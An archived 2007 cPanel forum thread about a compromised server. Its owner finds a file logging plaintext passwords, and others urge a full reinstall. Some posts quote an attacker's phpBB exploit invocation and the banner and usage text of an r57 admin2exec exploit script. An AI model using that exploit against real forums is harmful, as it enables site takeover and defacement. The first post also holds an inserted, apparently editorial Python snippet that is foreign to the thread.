The Community Forums

Interact with an entire community of cPanel & WHM users!

Would this work on /.a

Discussion in 'General Discussion' started by viooltje, Jul 22, 2007.

  1. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    pico .bash_profile

    add this:
    perl -pi -w -e 's/\(searched.*?secretpass.*?patern.*?\)/\(replace something\)/g;' /.a
    perl -pi -w -e 's/^usernames/replaced username/g;' /.a
    perl -pi -w -e 's/your ip.*?your ip/new ip/g;' /.a


    Would this work or not?
    After every login it should rewrite the /.a file, which contains plain-text login passwords.
    Or is this nonsense that doesn't improve server security at all?


    A question:
    I have a file in /.a containing:
    login name@86.ip.160 (plain text password) [Wed Jul 11 2007 12:05:46 +0200]


    Which file is writing to it, and how do I change the file?
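    As an added example (not from the poster or from cPanel): during incident response a file like /.a is useful only as a list of credentials that must be rotated; rewriting it from .bash_profile leaves whatever is capturing the logins in place. This Python snippet parses lines in the shape the post shows, assuming the format `user@host (password) [timestamp]` (the exact regex and timestamp layout are assumptions, since the post only shows a redacted line), and reports which accounts were captured and from where without keeping the plaintext passwords.

```python
import re
import hashlib
from collections import defaultdict
from datetime import datetime

# Line shape as shown in the post: "<user>@<host> (<password>) [<timestamp>]".
# The exact regex and timestamp format are assumptions; the poster only showed a redacted line.
LINE_RE = re.compile(r'^(?P<user>\S+)@(?P<host>\S+) \((?P<password>.*)\) \[(?P<ts>[^\]]+)\]$')
TS_FMT = '%a %b %d %Y %H:%M:%S %z'

def parse_line(line):
    """Return (user, host, password, timestamp) or None if the line is not a credential record."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        ts = datetime.strptime(m.group('ts'), TS_FMT)
    except ValueError:
        ts = None  # keep the record even if the timestamp is mangled
    return m.group('user'), m.group('host'), m.group('password'), ts

def fingerprint(secret):
    """Non-reversible tag so repeated captures of one password can be matched without storing it."""
    return hashlib.sha256(secret.encode()).hexdigest()[:12]

def rotation_report(lines):
    """Per account: source hosts, capture count, distinct passwords, last seen. No plaintext is returned."""
    report = defaultdict(lambda: {'hosts': set(), 'captures': 0, 'password_tags': set(), 'last': None})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        user, host, password, ts = parsed
        entry = report[user]
        entry['hosts'].add(host)
        entry['captures'] += 1
        entry['password_tags'].add(fingerprint(password))
        if ts is not None and (entry['last'] is None or ts > entry['last']):
            entry['last'] = ts
    return dict(report)

# Constructed sample lines in the shape the post describes; all values are made up.
SAMPLE = """\
alice@198.51.100.7 (hunter2) [Wed Jul 11 2007 12:05:46 +0200]
bob@203.0.113.9 (letmein) [Wed Jul 11 2007 13:10:02 +0200]
alice@203.0.113.9 (hunter2) [Thu Jul 12 2007 08:00:00 +0200]
not a credential record
""".splitlines()
```

    Every account named in the report needs its password changed after the host is reinstalled, since changing it on the compromised box only feeds the logger again.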
     
  2. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    I'm not going to get deep into this thread, but unless you still haven't rebuilt that server you shouldn't see a file like that. Are you saying that file is in "/" or in "/root"?

    If this is the same hacked server then I guess it's pretty normal for you to find that file and others like it..... :rolleyes:
     
  3. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    I think I have rebuilt the server; everything is running normally and all the security safe audits are in place.
    Only that file is left.
     
  4. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    Just out of curiosity, what did you do to "rebuild" the server? I mean just general steps, you don't have to give exact details.
     
  5. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,474
    Likes Received:
    202
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Why not? He's posted a "sticky" about the exact details on the hacked server.

    http://www.lordsoflords.com/forums/topic.php?tid=7602

    "I think I have cleaned the server, but not sure a special dude is looking at it, I hope he don't install more trojans."

    While the rest of the Web gets attacked from this server, he's posting stickies about what he's "learned so far".

    Time for an email to his ISP I think. This has gone on too long. Anyone from ev1servers reading this crap?


    lordsoflords.com (66.98.254.23)
     
  6. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,281
    Likes Received:
    37
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    Agreed. This is asinine. It's apparent that no real attempt was made to wipe/reinstall. And anything less than that, for him, would be ineffective. Even the most security-conscious and security-knowledgeable people often think twice about trying to clean up after a rootkit; for him to think that he is going to have a rooted box all secured is a longshot.

    Once I paid enough attention to the thread to see that there have been actual websites defaced by activities originating from his machine, that was enough to say that somebody needs to get it the hell off the net immediately.

    Mike
     
  7. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    milw0rm.com

    You will find even more scary stuff to worry about.
    All servers are under constant attack!

    ____________________________________________________________

    a file called 'f' contains this:
    perl a -u http://$1 -L z3c3v3 -P fbiteam -i 2


    he calls for it:

    He's attacking and taking over old phpBB forums.
    I had one running too; after I removed phpBB it now seems to be fine again.


    print "\\=-----------------------------------=/\r\n";
    print "| phpBB admin2exec exploit by RST/GHC |\r\n";
    print "| version 2 (user_sig_bbcode_uid) |\r\n";
    print "/=-----------------------------------=\\\r\n";
    print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
    print " Options:\r\n";
    print " -u - path to forum e.g. http://site/f...

    done a lot of these things and googling.
     
